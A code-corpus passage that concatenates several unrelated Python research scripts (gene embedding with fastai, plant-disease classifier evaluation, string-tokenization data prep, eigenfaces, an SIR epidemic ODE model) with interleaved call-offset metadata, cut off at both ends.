matplotlib.pyplot as plt\n'), ((4894, 4939), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Number of Subjects"""'], {'fontsize': '(18)'}), "('Number of Subjects', fontsize=18)\n", (4904, 4939), True, 'import matplotlib.pyplot as plt\n'), ((5002, 5091), 'os.path.join', 'join', (['results_dir', "('MUSim_Null_FamilywiseTypeI_%s_%dtrials.tif' % (time_wind, trials))"], {}), "(results_dir, 'MUSim_Null_FamilywiseTypeI_%s_%dtrials.tif' % (time_wind,\n trials))\n", (5006, 5091), False, 'from os.path import join\n'), ((5101, 5152), 'matplotlib.pyplot.savefig', 'plt.savefig', (['img_file'], {'bbox_inches': '"""tight"""', 'dpi': '(600)'}), "(img_file, bbox_inches='tight', dpi=600)\n", (5112, 5152), True, 'import matplotlib.pyplot as plt\n'), ((5166, 5177), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (5175, 5177), True, 'import matplotlib.pyplot as plt\n'), ((5271, 5294), 'os.listdir', 'os.listdir', (['results_dir'], {}), '(results_dir)\n', (5281, 5294), False, 'import os\n'), ((5437, 5463), 'os.path.join', 'join', (['results_dir', 'ew_file'], {}), '(results_dir, ew_file)\n', (5441, 5463), False, 'from os.path import join\n'), ((6035, 6051), 'matplotlib.pyplot.ylim', 'plt.ylim', (['(0, 1)'], {}), '((0, 1))\n', (6043, 6051), True, 'import matplotlib.pyplot as plt\n'), ((2654, 2685), 'os.path.join', 'join', (['results_dir', '"""legend.tif"""'], {}), "(results_dir, 'legend.tif')\n", (2658, 2685), False, 'from os.path import join\n'), ((2703, 2754), 'matplotlib.pyplot.savefig', 'plt.savefig', (['img_file'], {'bbox_inches': '"""tight"""', 'dpi': '(600)'}), "(img_file, bbox_inches='tight', dpi=600)\n", (2714, 2754), True, 'import matplotlib.pyplot as plt\n'), ((2772, 2783), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2781, 2783), True, 'import matplotlib.pyplot as plt\n'), ((2528, 2559), 'os.path.join', 'join', (['results_dir', '"""legend.tif"""'], {}), "(results_dir, 'legend.tif')\n", (2532, 2559), False, 'from os.path import join\n'), ((4860, 4876), 'numpy.arange', 'np.arange', (['(1)', '(11)'], {}), '(1, 11)\n', (4869, 4876), True, 'import numpy as np\n')]
|
from __future__ import print_function
from argparse import ArgumentParser
from fastai.learner import *
from fastai.column_data import *
import numpy as np
import pandas as pd
def build_parser():
parser = ArgumentParser()
parser.add_argument('--data', type=str, nargs=None, dest='in_path', help='input file path', required=True)
parser.add_argument('--out-prefix', type=str, nargs=None, dest='model', help='output prefix', required=True)
parser.add_argument('--out-dir', type=str, nargs=None, dest='out_dir', help='output directory', required=True)
parser.add_argument('--num-dim', type=int, nargs=None, dest='num_dim', help='number of dimension of resulting embedding', required=False, default=50)
parser.add_argument('--bs', type=int, nargs=None, dest='bs', help='batch size', required=False, default=64)
parser.add_argument('--num-epoch', type=int, nargs=None, dest='num_eps', help='number of epoch(s)', required=False, default=3)
parser.add_argument('--learning-rate', type=float, nargs=None, dest='lr', help='learning rate', required=False, default=1e-5)
return parser
def main():
parser = build_parser()
opts = parser.parse_args()
if torch.cuda.is_available() and torch.backends.cudnn.enabled:
torch.cuda.set_device(0)
else:
print('CUDA or CUDNN not available.')
return
in_path = opts.in_path
n_factors = opts.num_dim
bs = opts.bs
num_eps = opts.num_eps
lr = opts.lr
out_dir = opts.out_dir
prefix = opts.model
outpath = out_dir+'/'+prefix+'_'
### data preparation
df = pd.read_csv(in_path, sep=',', low_memory=False, index_col=[0], error_bad_lines=False)
sids = list(df.index)
df = df.assign(id=sids)
df = df.reset_index(drop=True)
mdf = pd.melt(df, id_vars=['id'], var_name='gene', value_name='log2exp')
### training
val_idxs = get_cv_idxs(len(mdf))
cd = CollabFilterDataset.from_data_frame(path, mdf, 'id', 'gene', 'log2exp')
learn = cd.get_learner(n_factors, val_idxs, bs, opt_fn=optim.Adam)
learn.fit(lr, num_eps)
learn.save(outpath+'model')
### plot jointplot
preds = learn.predict()
y=learn.data.val_y
jp = sns.jointplot(preds, y, kind='hex', stat_func=None)
jp.set_axis_labels('ground truth log2(exp)', 'predicted log2(exp)')
jp.savefig(outpath+'trn_metric_jointplot.png')
### output embedding
genes = list(df.columns[:-2])
sids = list(df['id'])
geneidx = np.array([cd.item2idx[g] for g in genes])
m=learn.model
m.cuda()
### output gene embedding matrix and bias
gene_emb = to_np(m.i(V(geneidx)))
gene_emb_df = pd.DataFrame(gene_emb, index=genes)
gene_emb_df.to_csv(outpath+'gemb.csv', sep=',')
gene_emb_bias = to_np(m.ib(V(geneidx)))
gene_emb_bias_df = pd.DataFrame(gene_emb_bias, index=genes)
gene_emb_bias_df.to_csv(outpath+'gemb_bias.csv')
### output sample embedding matrix and bias
sampleidx = np.array([cd.user2idx[sid] for sid in sids])
samp_emb = to_np(m.u(V(sampleidx)))
samp_emb_df = pd.DataFrame(samp_emb, index=sids)
samp_emb_df.to_csv(outpath+'semb.csv', sep=',')
samp_emb_bias = to_np(m.ub(V(sampleidx)))
samp_emb_bias_df = pd.DataFrame(samp_emb_bias, index=sids)
samp_emb_bias_df.to_csv(outpath+'semb_bias.csv')
if __name__ == '__main__':
main()
|
[
"argparse.ArgumentParser",
"pandas.read_csv",
"numpy.array",
"pandas.DataFrame",
"pandas.melt"
] |
[((211, 227), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (225, 227), False, 'from argparse import ArgumentParser\n'), ((1605, 1694), 'pandas.read_csv', 'pd.read_csv', (['in_path'], {'sep': '""","""', 'low_memory': '(False)', 'index_col': '[0]', 'error_bad_lines': '(False)'}), "(in_path, sep=',', low_memory=False, index_col=[0],\n error_bad_lines=False)\n", (1616, 1694), True, 'import pandas as pd\n'), ((1790, 1856), 'pandas.melt', 'pd.melt', (['df'], {'id_vars': "['id']", 'var_name': '"""gene"""', 'value_name': '"""log2exp"""'}), "(df, id_vars=['id'], var_name='gene', value_name='log2exp')\n", (1797, 1856), True, 'import pandas as pd\n'), ((2482, 2523), 'numpy.array', 'np.array', (['[cd.item2idx[g] for g in genes]'], {}), '([cd.item2idx[g] for g in genes])\n', (2490, 2523), True, 'import numpy as np\n'), ((2659, 2694), 'pandas.DataFrame', 'pd.DataFrame', (['gene_emb'], {'index': 'genes'}), '(gene_emb, index=genes)\n', (2671, 2694), True, 'import pandas as pd\n'), ((2814, 2854), 'pandas.DataFrame', 'pd.DataFrame', (['gene_emb_bias'], {'index': 'genes'}), '(gene_emb_bias, index=genes)\n', (2826, 2854), True, 'import pandas as pd\n'), ((2973, 3017), 'numpy.array', 'np.array', (['[cd.user2idx[sid] for sid in sids]'], {}), '([cd.user2idx[sid] for sid in sids])\n', (2981, 3017), True, 'import numpy as np\n'), ((3076, 3110), 'pandas.DataFrame', 'pd.DataFrame', (['samp_emb'], {'index': 'sids'}), '(samp_emb, index=sids)\n', (3088, 3110), True, 'import pandas as pd\n'), ((3232, 3271), 'pandas.DataFrame', 'pd.DataFrame', (['samp_emb_bias'], {'index': 'sids'}), '(samp_emb_bias, index=sids)\n', (3244, 3271), True, 'import pandas as pd\n')]
|
# %%
import matplotlib.pyplot as plt
import numpy as np
import sklearn
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader
from model.inceptionv4 import inceptionv4
from model.mobilenetv2 import mobilenetv2
from model.resnet import resnet18
from model.shufflenetv2 import shufflenetv2
from model.vgg import vgg9_bn
from s3_dataset import PlantDataSet, PlantDataSetB
# %%
def get_acc(net, device, data_loader):
'''
get acc
'''
correct = 0
total = 0
with torch.no_grad():
net.eval()
for data in data_loader:
images, labels = data
images = images.float().to(device)
labels = labels.long().to(device)
outputs = net(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
return correct / total
def get_pre(net, device, data_loader):
'''
得到整个测试集预测的结果,以及标签
'''
label_all = []
pre_all = []
with torch.no_grad():
net.eval()
for data in data_loader:
images, labels = data
images = images.float().to(device)
labels = labels.long().to(device)
outputs = net(images)
_, predicted = torch.max(outputs.data, 1)
label_all.extend(labels.data.cpu().numpy())
pre_all.extend(predicted.data.cpu().numpy())
return pre_all, label_all
# %%
Func = [vgg9_bn, resnet18, shufflenetv2, mobilenetv2, inceptionv4]
Save_path = [
'../model_save/plant_disease2/vgg.pth',
'../model_save/plant_disease2/resnet18.pth',
'../model_save/plant_disease2/shufflenetv2.pth',
'../model_save/plant_disease2/mobilenetv2.pth',
'../model_save/plant_disease2/inceptionv4.pth'
]
device = torch.device('cuda:1' if torch.cuda.is_available() else 'cpu')
# data_loader_val = DataLoader(PlantDataSetB(flag='val'),
# batch_size=64,
# shuffle=False)
# data_loader_test = DataLoader(PlantDataSetB(flag='test'),
# batch_size=64,
# shuffle=False)
data_loader_val = DataLoader(PlantDataSet(flag='val'),
batch_size=64,
shuffle=False)
data_loader_test = DataLoader(PlantDataSet(flag='test'),
batch_size=64,
shuffle=False)
print('A 域数据集: 校核')
for Index in range(1):
# 导入模型和权重
net = Func[Index]()
path_saved_model = Save_path[Index]
net.load_state_dict(torch.load(path_saved_model))
net.to(device)
val_acc = get_acc(net, device, data_loader_val)
test_acc = get_acc(net, device, data_loader_test)
print('{:d}: val_acc:{:.5f}, test_acc:{:.5f}'.format(
Index, val_acc, test_acc))
# %%
# 计算每个模型在两个测试集上的混淆矩阵
device = torch.device('cuda:1' if torch.cuda.is_available() else 'cpu')
Func = [vgg9_bn, resnet18, shufflenetv2, mobilenetv2, inceptionv4]
Save_path = [
'../model_save/plant_disease2/vgg.pth',
'../model_save/plant_disease2/resnet18.pth',
'../model_save/plant_disease2/shufflenetv2.pth',
'../model_save/plant_disease2/mobilenetv2.pth',
'../model_save/plant_disease2/inceptionv4.pth'
]
data_test_a = DataLoader(PlantDataSet(flag='test'),
batch_size=64,
shuffle=False)
data_test_b = DataLoader(PlantDataSetB(flag='test'),
batch_size=64,
shuffle=False)
Index = 1
# 导入模型和权重
net = Func[Index]()
path_saved_model = Save_path[Index]
net.load_state_dict(torch.load(path_saved_model))
net.to(device)
pre, label = get_pre(net, device, data_test_b)
pre, label = np.array(pre), np.array(label)
# %%
import matplotlib.pyplot as plt
from sklearn.metrics import accuracy_score # 精度
from sklearn.metrics import confusion_matrix # 混淆矩阵
print('预测精度为:{:.9f}'.format(accuracy_score(label, pre)))
# 查看混淆矩阵
domain_A_class = {
'Apple___Apple_scab': 0,
'Apple___Black_rot': 1,
'Apple___Cedar_apple_rust': 2,
'Apple___healthy': 3,
'Blueberry___healthy': 4,
'Cherry_(including_sour)___Powdery_mildew': 5,
'Cherry_(including_sour)___healthy': 6,
'Corn_(maize)___Cercospora_leaf_spot Gray_leaf_spot': 7,
'Corn_(maize)___Common_rust_': 8,
'Corn_(maize)___Northern_Leaf_Blight': 9,
'Corn_(maize)___healthy': 10,
'Grape___Black_rot': 11,
'Grape___Esca_(Black_Measles)': 12,
'Grape___Leaf_blight_(Isariopsis_Leaf_Spot)':13,
'Grape___healthy':14,
'Orange___Haunglongbing_(Citrus_greening)':15,
'Peach___Bacterial_spot':16,
'Peach___healthy':17,
'Pepper,_bell___Bacterial_spot':18,
'Pepper,_bell___healthy':19,
'Potato___Early_blight':20,
'Potato___Late_blight':21,
'Potato___healthy':22,
'Raspberry___healthy':23,
'Soybean___healthy':24,
'Squash___Powdery_mildew':25,
'Strawberry___Leaf_scorch':26,
'Strawberry___healthy':27,
'Tomato___Bacterial_spot':28,
'Tomato___Early_blight':29,
'Tomato___Late_blight':30,
'Tomato___Leaf_Mold':31,
'Tomato___Septoria_leaf_spot':32,
'Tomato___Spider_mites Two-spotted_spider_mite':33,
'Tomato___Target_Spot':34,
'Tomato___Tomato_Yellow_Leaf_Curl_Virus':35,
'Tomato___Tomato_mosaic_virus':36,
'Tomato___healthy':37}
c_matrix = confusion_matrix(label, pre, labels=list(range(38)))
# %% 这个代码留着
def plot_Matrix(cm, classes, title=None, cmap=plt.cm.Blues):
plt.rc('font',family='Times New Roman',size='8') # 设置字体样式、大小
# 按行进行归一化
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
str_cm = cm.astype(np.str).tolist()
for row in str_cm:
print('\t'.join(row))
# 占比1%以下的单元格,设为0,防止在最后的颜色中体现出来
for i in range(cm.shape[0]):
for j in range(cm.shape[1]):
if int(cm[i, j]*100 + 0.5) == 0:
cm[i, j]=0
fig, ax = plt.subplots()
im = ax.imshow(cm, interpolation='nearest', cmap=cmap)
# ax.figure.colorbar(im, ax=ax) # 侧边的颜色条带
ax.set(xticks=np.arange(cm.shape[1]),
yticks=np.arange(cm.shape[0]),
xticklabels=classes, yticklabels=classes,
title=title,
ylabel='Actual',
xlabel='Predicted')
# 通过绘制格网,模拟每个单元格的边框
ax.set_xticks(np.arange(cm.shape[1]+1)-.5, minor=True)
ax.set_yticks(np.arange(cm.shape[0]+1)-.5, minor=True)
ax.grid(which="minor", color="gray", linestyle='-', linewidth=0.2)
ax.tick_params(which="minor", bottom=False, left=False)
# 将x轴上的lables旋转45度
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
# 标注百分比信息
fmt = 'd'
thresh = cm.max() / 2.
for i in range(cm.shape[0]):
for j in range(cm.shape[1]):
if int(cm[i, j]*100 + 0.5) > 0:
ax.text(j, i, format(int(cm[i, j]*100 + 0.5) , fmt) + '%',
ha="center", va="center",
color="white" if cm[i, j] > thresh else "black")
plt.show()
# %%
domain_A_class.keys()
# %%
plt.matshow(cm, cmap=plt.cm.Blues)
# %%
|
[
"sklearn.metrics.accuracy_score",
"s3_dataset.PlantDataSetB",
"numpy.arange",
"torch.load",
"torch.max",
"numpy.array",
"torch.cuda.is_available",
"s3_dataset.PlantDataSet",
"torch.no_grad",
"matplotlib.pyplot.matshow",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.rc",
"matplotlib.pyplot.show"
] |
[((7200, 7234), 'matplotlib.pyplot.matshow', 'plt.matshow', (['cm'], {'cmap': 'plt.cm.Blues'}), '(cm, cmap=plt.cm.Blues)\n', (7211, 7234), True, 'import matplotlib.pyplot as plt\n'), ((2225, 2249), 's3_dataset.PlantDataSet', 'PlantDataSet', ([], {'flag': '"""val"""'}), "(flag='val')\n", (2237, 2249), False, 'from s3_dataset import PlantDataSet, PlantDataSetB\n'), ((2369, 2394), 's3_dataset.PlantDataSet', 'PlantDataSet', ([], {'flag': '"""test"""'}), "(flag='test')\n", (2381, 2394), False, 'from s3_dataset import PlantDataSet, PlantDataSetB\n'), ((3337, 3362), 's3_dataset.PlantDataSet', 'PlantDataSet', ([], {'flag': '"""test"""'}), "(flag='test')\n", (3349, 3362), False, 'from s3_dataset import PlantDataSet, PlantDataSetB\n'), ((3477, 3503), 's3_dataset.PlantDataSetB', 'PlantDataSetB', ([], {'flag': '"""test"""'}), "(flag='test')\n", (3490, 3503), False, 'from s3_dataset import PlantDataSet, PlantDataSetB\n'), ((3691, 3719), 'torch.load', 'torch.load', (['path_saved_model'], {}), '(path_saved_model)\n', (3701, 3719), False, 'import torch\n'), ((3796, 3809), 'numpy.array', 'np.array', (['pre'], {}), '(pre)\n', (3804, 3809), True, 'import numpy as np\n'), ((3811, 3826), 'numpy.array', 'np.array', (['label'], {}), '(label)\n', (3819, 3826), True, 'import numpy as np\n'), ((5563, 5613), 'matplotlib.pyplot.rc', 'plt.rc', (['"""font"""'], {'family': '"""Times New Roman"""', 'size': '"""8"""'}), "('font', family='Times New Roman', size='8')\n", (5569, 5613), True, 'import matplotlib.pyplot as plt\n'), ((6031, 6045), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (6043, 6045), True, 'import matplotlib.pyplot as plt\n'), ((7154, 7164), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7162, 7164), True, 'import matplotlib.pyplot as plt\n'), ((530, 545), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (543, 545), False, 'import torch\n'), ((1058, 1073), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1071, 1073), False, 'import torch\n'), ((1859, 1884), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1882, 1884), False, 'import torch\n'), ((2632, 2660), 'torch.load', 'torch.load', (['path_saved_model'], {}), '(path_saved_model)\n', (2642, 2660), False, 'import torch\n'), ((2942, 2967), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (2965, 2967), False, 'import torch\n'), ((4006, 4032), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['label', 'pre'], {}), '(label, pre)\n', (4020, 4032), False, 'from sklearn.metrics import accuracy_score\n'), ((787, 813), 'torch.max', 'torch.max', (['outputs.data', '(1)'], {}), '(outputs.data, 1)\n', (796, 813), False, 'import torch\n'), ((1315, 1341), 'torch.max', 'torch.max', (['outputs.data', '(1)'], {}), '(outputs.data, 1)\n', (1324, 1341), False, 'import torch\n'), ((6174, 6196), 'numpy.arange', 'np.arange', (['cm.shape[1]'], {}), '(cm.shape[1])\n', (6183, 6196), True, 'import numpy as np\n'), ((6216, 6238), 'numpy.arange', 'np.arange', (['cm.shape[0]'], {}), '(cm.shape[0])\n', (6225, 6238), True, 'import numpy as np\n'), ((6419, 6445), 'numpy.arange', 'np.arange', (['(cm.shape[1] + 1)'], {}), '(cm.shape[1] + 1)\n', (6428, 6445), True, 'import numpy as np\n'), ((6478, 6504), 'numpy.arange', 'np.arange', (['(cm.shape[0] + 1)'], {}), '(cm.shape[0] + 1)\n', (6487, 6504), True, 'import numpy as np\n')]
|
import numpy as np
import json
import re
from Utils import *
np.random.seed(4)
def output_process(example):
state = e['state'][-1]
if type(state) == str:
return state
else:
return ' '.join(state)
def polish_notation(steps):
step_mapping = {}
for ix, s in enumerate(steps):
references = re.findall('@@\d+@@', s)
if len(references):
indices = [int(x.replace('@@','')) - 1 for x in references]
if len(references) == 1:
s = '(' + s.replace(' ' + references[0], '') + ', ' + step_mapping[indices[0]] + ')'
step_mapping[ix] = s
else:
first_index, final_index = s.index(references[0]) - 1, s.index(references[-1]) + len(references[-1])
s = '(' + s[:first_index] + s[final_index:] + ', '
for jx in indices:
s += step_mapping[jx] + ', '
s = s[:-2] + ')'
step_mapping[ix] = s
else:
step_mapping[ix] = s
return step_mapping[len(steps) - 1][1:-1]
def subgraphs_from_polish(polish_):
if polish_.count('(') == 0 and polish_.count(','):
return [x.strip() for x in polish_.split(',')][1:]
result_holder = []
while True:
try:
first_paren = polish_.index('(')
except ValueError:
break
open_paren = 1
for ix, char in enumerate(polish_[first_paren+1:]):
if char == '(':
open_paren += 1
elif char == ')':
open_paren -= 1
if open_paren == 0:
result_holder.append(polish_[first_paren+1:first_paren + ix + 1])
polish_ = polish_[first_paren + ix:]
# print('new polish:', polish_)
break
while '' in result_holder:
result_holder.remove('')
intermed_results = [subgraphs_from_polish(x) for x in result_holder]
if type(intermed_results[0]) == list:
intermed_results = [item for sublist in intermed_results for item in sublist]
return result_holder + intermed_results
def remove_duplicates(data_list):
data_set = []
sorted_data = sorted(data_list, key=lambda x: ' '.join(x['nlg']))
for ix in range(len(sorted_data) - 1):
e = sorted_data[ix]
if e['nlg'] != sorted_data[ix + 1]['nlg']:
data_set.append(e)
data_set.append(sorted_data[-1])
return data_set
def is_valid_dag(nlg):
steps_n = len(nlg)
references = re.findall('@@\d+@@', ' '.join(nlg))
return len(list(set(references))) + 1 == steps_n
def get_valid_subgraphs(example):
states, instructions, tokenized_states = example['state'], example['nlg'], example['tokenized_state']
subgraphs = []
steps_n = len(states)
for steps_index in range(steps_n):
if is_valid_dag(instructions[:steps_index + 1]):
subgraphs.append((instructions[:steps_index + 1], tokenized_states[steps_index]))
else:
new_instructions = prune_and_reference(instructions[:steps_index + 1])
subgraphs.append((new_instructions, tokenized_states[steps_index]))
return subgraphs
def prune_and_reference(instructions):
queue = [instructions[-1]]
required_indices = [len(instructions) - 1]
while len(queue):
step = queue.pop(0)
references = re.findall(r'@@\d+@@', step)
indices = [int(x.replace('@@', '')) - 1 for x in references]
required_indices += indices
queue += [instructions[index] for index in indices]
prior_removals = 0
pruned_instructions = []
for index, instruction in enumerate(instructions):
if index not in required_indices:
prior_removals += 1
else:
if prior_removals > 0:
for ref_index, referencer in enumerate(instructions[index + 1:]):
if '@@' + str(index + 1) + '@@' in referencer:
instructions[index + ref_index + 1] = instructions[index + ref_index + 1].replace(
'@@' + str(index + 1) + '@@', '@@' + str(index + 1 - prior_removals) + '@@'
)
pruned_instructions.append(instruction)
return pruned_instructions
def tokenize_string(example_state, example_vocab):
return_step = ''
temp_state = example_state[:].lower()
first_tok = True
while len(temp_state):
if temp_state[:3] in example_vocab or temp_state[:3][::-1] in example_vocab:
if first_tok:
return_step += temp_state[:3] + ' '
first_tok = False
else:
return_step += '%' + temp_state[:3] + ' '
temp_state = temp_state[3:]
elif temp_state[:2] in example_vocab or temp_state[:2][::-1] in example_vocab:
if first_tok:
return_step += temp_state[:2] + ' '
first_tok = False
else:
return_step += '%' + temp_state[:2] + ' '
temp_state = temp_state[2:]
elif temp_state[0] in example_vocab:
if first_tok:
return_step += temp_state[0] + ' '
first_tok = False
else:
return_step += '%' + temp_state[0] + ' '
temp_state = temp_state[1:]
else:
return None
return return_step
with open('list_task_v2.json', 'r', encoding="utf-8") as input_file:
data = json.loads(input_file.read())
data = remove_duplicates(data)
n = len(data)
np.random.shuffle(data)
vocab = []
for e in data:
e_vocab, tokenized_state = [], []
nlg, state = e['nlg'], e['state']
add_bool = True
for ix, step in enumerate(nlg):
tokenized_step = ''
# if terminal node ...
if step.startswith('the string '):
new_string = step.split("'")[1]
tokenized_state.append(state[ix].lower().strip())
e_vocab.append(new_string.lower())
# if state is a string
elif type(state[ix]) == str:
# if it's a reversal
if state[ix][::-1].lower() in e_vocab:
tokenized_state.append(state[ix].lower().strip())
else:
tokenized_step = tokenize_string(state[ix], e_vocab)
if tokenized_step is not None:
tokenized_state.append(tokenized_step.strip())
else:
add_bool = False
break
# if state[ix] is a list
else:
for list_element in state[ix]:
temp_tok = tokenize_string(list_element, e_vocab)
if temp_tok is None:
add_bool = False
break
else:
tokenized_step += ' ' + temp_tok
if add_bool:
tokenize_step = remove_whitespace(tokenized_step).strip()
tokenized_state.append(tokenized_step)
else:
break
if add_bool:
e['tokenized_state'] = tokenized_state
vocab += e_vocab + ['%' + x for x in e_vocab] + [x[::-1] for x in e_vocab] + ['%' + x[::-1] for x in e_vocab]
vocab = list(set(vocab))
# with open('string_piece_vocabulary.txt', 'w', encoding='utf-8') as f:
# f.write('\n'.join(vocab))
filtered_data = []
for e in data:
if 'tokenized_state' in e.keys():
filtered_data.append(e)
train = filtered_data[:int(n*0.8)]
val = filtered_data[int(n*0.8):int(n*0.9)]
test = filtered_data[int(n*0.9):]
train_in, train_out = '', ''
for jx, e in enumerate(train):
if jx % 5000 == 0:
print(round(float(jx / len(train) * 100), 2), '% complete')
subgraphs = get_valid_subgraphs(e)
for subgraph in subgraphs:
train_input = remove_whitespace(' @@SEP@@ '.join(subgraph[0]).lower().strip())
train_in += train_input + '\n'
if type(subgraph[1]) == list:
train_out += ' '.join(subgraph[1]) + '\n'
else:
train_out += remove_whitespace(subgraph[1].strip()) + '\n'
# train_in += ' @@SEP@@ '.join(e['nlg']).lower() + '\n'
# train_out += e['tokenized_state'][-1].strip() + '\n'
val_in, val_out = '', ''
for e in val:
val_input = ' @@SEP@@ '.join(e['nlg']).lower()
val_in += val_input + '\n'
val_out += e['tokenized_state'][-1].strip() + '\n'
test_in, test_out = '', ''
for e in test:
test_input = ' @@SEP@@ '.join(e['nlg']).lower()
test_in += test_input + '\n'
test_out += e['tokenized_state'][-1].strip() + '\n'
base_path = './dag_baseline_2a/'
with open(base_path + 'train_in.txt', 'w', encoding='utf-8') as f:
f.write(train_in)
with open(base_path + 'train_out.txt', 'w', encoding='utf-8') as f:
f.write(train_out)
with open(base_path + 'val_in.txt', 'w', encoding='utf-8') as f:
f.write(val_in)
with open(base_path + 'val_out.txt', 'w', encoding='utf-8') as f:
f.write(val_out)
with open(base_path + 'test_in.txt', 'w', encoding='utf-8') as f:
f.write(test_in)
with open(base_path + 'test_out.txt', 'w', encoding='utf-8') as f:
f.write(test_out)
|
[
"re.findall",
"numpy.random.seed",
"numpy.random.shuffle"
] |
[((62, 79), 'numpy.random.seed', 'np.random.seed', (['(4)'], {}), '(4)\n', (76, 79), True, 'import numpy as np\n'), ((5577, 5600), 'numpy.random.shuffle', 'np.random.shuffle', (['data'], {}), '(data)\n', (5594, 5600), True, 'import numpy as np\n'), ((335, 360), 're.findall', 're.findall', (['"""@@\\\\d+@@"""', 's'], {}), "('@@\\\\d+@@', s)\n", (345, 360), False, 'import re\n'), ((3386, 3414), 're.findall', 're.findall', (['"""@@\\\\d+@@"""', 'step'], {}), "('@@\\\\d+@@', step)\n", (3396, 3414), False, 'import re\n')]
|
from cv2 import cv2
import numpy as np
import sys
import os
from base import normalize
# some parameters of training and testing data
train_sub_count = 40
train_img_count = 5
total_face = 200
row = 70
col = 70
def eigenfaces_train(src_path):
img_list = np.empty((row*col, total_face))
count = 0
# read all the faces and flatten them
for i in range(1, train_sub_count+1):
for j in range(1, train_img_count+1):
img_path = src_path + "/s" + str(i) + "/" + str(j) + ".png"
img = cv2.imread(img_path, 0)
img_col = np.array(img).flatten()
img_list[:, count] = img_col[:]
count += 1
# compute the average of the faces
img_mean = np.sum(img_list, axis=1) / total_face
diff = np.empty((row*col, total_face))
# compute the difference matrix
for i in range(0, total_face):
diff[:, i] = img_list[:, i] - img_mean[:]
cov = np.mat(diff)*np.mat(diff.T) / total_face
eigen_values, eigen_vectors = np.linalg.eigh(cov)
# sort the eigenvalues and eigenvectors by desc
sort_index = np.argsort(-eigen_values)
eigen_values = eigen_values[sort_index]
eigen_vectors = eigen_vectors[:, sort_index]
# print(eigen_values)
'''
compute the coveriance matrix
here we don't use original algrithom to avoid computing an 10000+ * 10000+ coveriance matrix later
oringinal: cov = 1/m * A*A^T => it will be an 10000+ * 10000+ matrix
when the dimension of the image (here we mean row*col) > the total number of the training images (here we mean total_face)
(1)cov*v = A*A^T*v = e*v (e is eigenvalue of cov, v is eigenvector of cov) => original
(2)let cov'*u = A^T*A*u = e*u
thus, on both sides of the equation(2) left side multiplied by A, we can get the equation below
(3)A*A^T*A*u = A*e2*u = e2*A*u
compare (1) with (3), if u is eigenvector of cov' of eigenvalue e, we can find that A*u = v
(e is not zero, cov and cov' have the same not-zero eigenvalues, but have different number of zero eigenvalue, it can be proofed)
so we can compute A^T*A instead of A*A^T to simplify the computation (which will generate a matrix with only 200 * 200 data)
cov = np.matrix(diff.T)*np.matrix(diff) / total_face
# compute the eigen values and eigen vectors of cov
eigen_values, vectors = np.linalg.eigh(cov)
eigen_vectors = np.matrix(diff)*np.matrix(vectors)
# sort the eigenvalues and eigenvectors by desc
sort_index = np.argsort(-eigen_values)
eigen_values = eigen_values[sort_index]
eigen_vectors = eigen_vectors[:, sort_index]
print(eigen_values)
'''
# for each image we compute the y (y = A^T * x, weight) and we will compare yf(the input image) with yf, find the nearest one
eigenfaces_weight = np.matrix(eigen_vectors.T)*np.matrix(diff)
return img_mean, eigen_values, eigen_vectors, eigenfaces_weight
|
[
"numpy.mat",
"cv2.cv2.imread",
"numpy.argsort",
"numpy.sum",
"numpy.array",
"numpy.empty",
"numpy.linalg.eigh",
"numpy.matrix"
] |
[((273, 306), 'numpy.empty', 'np.empty', (['(row * col, total_face)'], {}), '((row * col, total_face))\n', (281, 306), True, 'import numpy as np\n'), ((803, 836), 'numpy.empty', 'np.empty', (['(row * col, total_face)'], {}), '((row * col, total_face))\n', (811, 836), True, 'import numpy as np\n'), ((1048, 1067), 'numpy.linalg.eigh', 'np.linalg.eigh', (['cov'], {}), '(cov)\n', (1062, 1067), True, 'import numpy as np\n'), ((1139, 1164), 'numpy.argsort', 'np.argsort', (['(-eigen_values)'], {}), '(-eigen_values)\n', (1149, 1164), True, 'import numpy as np\n'), ((751, 775), 'numpy.sum', 'np.sum', (['img_list'], {'axis': '(1)'}), '(img_list, axis=1)\n', (757, 775), True, 'import numpy as np\n'), ((2875, 2901), 'numpy.matrix', 'np.matrix', (['eigen_vectors.T'], {}), '(eigen_vectors.T)\n', (2884, 2901), True, 'import numpy as np\n'), ((2902, 2917), 'numpy.matrix', 'np.matrix', (['diff'], {}), '(diff)\n', (2911, 2917), True, 'import numpy as np\n'), ((547, 570), 'cv2.cv2.imread', 'cv2.imread', (['img_path', '(0)'], {}), '(img_path, 0)\n', (557, 570), False, 'from cv2 import cv2\n'), ((972, 984), 'numpy.mat', 'np.mat', (['diff'], {}), '(diff)\n', (978, 984), True, 'import numpy as np\n'), ((985, 999), 'numpy.mat', 'np.mat', (['diff.T'], {}), '(diff.T)\n', (991, 999), True, 'import numpy as np\n'), ((596, 609), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (604, 609), True, 'import numpy as np\n')]
|
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import odeint
T = 200
h = 1e-2
t = np.arange(start=0, stop=T + h, step=h)
bet, gam = 0.15, 1 / 50
# todo: zmienic poziej na randoma
# S_pocz = np.random.uniform(0.7, 1)
S_start = 0.8
I_start = 1 - S_start
R_start = 0
N = S_start + I_start + R_start # is const
# using odeint
# ---------------------------------------------------------------------------------------------------------------------#
def two_diff_ode_equation(state, t, bet, gam):
S, I = state
return [- bet * I * S / N, bet * I * S / N - gam * I]
def one_diff_equation_ode(state, t, bet, gam):
S = state[0]
C = I_start - gam / bet * np.log(S_start) + S_start # C - const
return [(-bet / N * S * (gam / bet * np.log(S) - S + C))]
def calc_R(S_arr, I_arr):
